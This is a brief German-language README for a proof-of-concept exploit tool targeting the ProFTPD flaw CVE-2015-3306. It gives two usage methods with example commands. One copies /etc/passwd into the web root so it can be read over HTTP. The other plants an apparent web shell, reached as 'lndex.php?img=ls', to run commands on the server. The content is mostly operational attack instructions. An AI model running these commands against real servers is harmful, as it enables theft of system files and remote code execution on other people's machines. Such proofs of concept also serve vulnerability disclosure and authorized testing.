
Tool zum Ausnutzen von CVE-2015-3306
PoC von Daniel Aldana für die Ausnutzung von CVE-2015-3306. Der Fehler wurde von Vadim Melihow gemeldet.
###METHODE 1:
Verwendung:
python cpx_proftp.py <IP> <REMOTE_ABSOLUTEPATH_SRC_FILE> <REMOTE_ABSOLUTEPATH_DST_FILE>
Beispiel:
python cpx_proftp.py 127.0.0.1 /etc/passwd /var/www/pass.txt
Danach versuchen:
http://127.0.0.1/pass.txt
###METHODE 2:
Verwendung:
python cpx_proftp.py <IP> <REMOTE_ABSOLUTEPATH_WEBDIR>
Beispiel:
python cpx_proftp.py 127.0.0.1 /var/www/html
Danach versuchen:
http://127.0.0.1/lndex.php?img=ls